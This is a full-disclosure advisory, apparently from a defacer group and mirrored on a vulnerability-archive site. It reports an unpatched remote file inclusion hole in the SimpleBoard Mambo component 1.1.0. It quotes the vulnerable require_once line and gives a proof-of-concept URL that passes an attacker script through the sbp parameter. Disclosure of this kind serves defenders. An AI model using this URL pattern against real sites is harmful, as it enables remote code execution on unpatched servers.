Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  уязвимости во многих популярных движках из за некоректной работы файловых функций языка PHP

  [Full-disclosure] PHProg : Local File Inclusion + XSS + Full path disclosure

  [Full-disclosure] KorviBlog - XSS permanent !

  Multible injections and vulnerabilities in Jetbox CMS

From:stormhacker_(at)_hotmail.com <stormhacker_(at)_hotmail.com>
Date:11.09.2006
Subject:SimpleBoard Mambo Component 1.1.0 Remote File Include

[W]orld [D]efacers Team

======================================

--------------------Summary----------------

eVuln ID: WD23

Vendor:  SimpleBoard Mambo Component 1.1.0

Vendor's Web Site: mamboxchange.com/projects/simpleboard

Class: Remote

PoC/Exploit: Available

Solution: Not Available

Discovered by: rUnViRuS (worlddefacers.de)

-----------------Description---------------

require_once("$sbp/sb_helpers.php");


--------------PoC/Exploit----------------------

http://website.com/components/com_simpleboard/file_upload.php?sbp=[evil_script]

--------------Solution---------------------

No Patch available.

--------------Credit-----------------------

Discovered by: rUnViRuS (worlddefacers.de)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server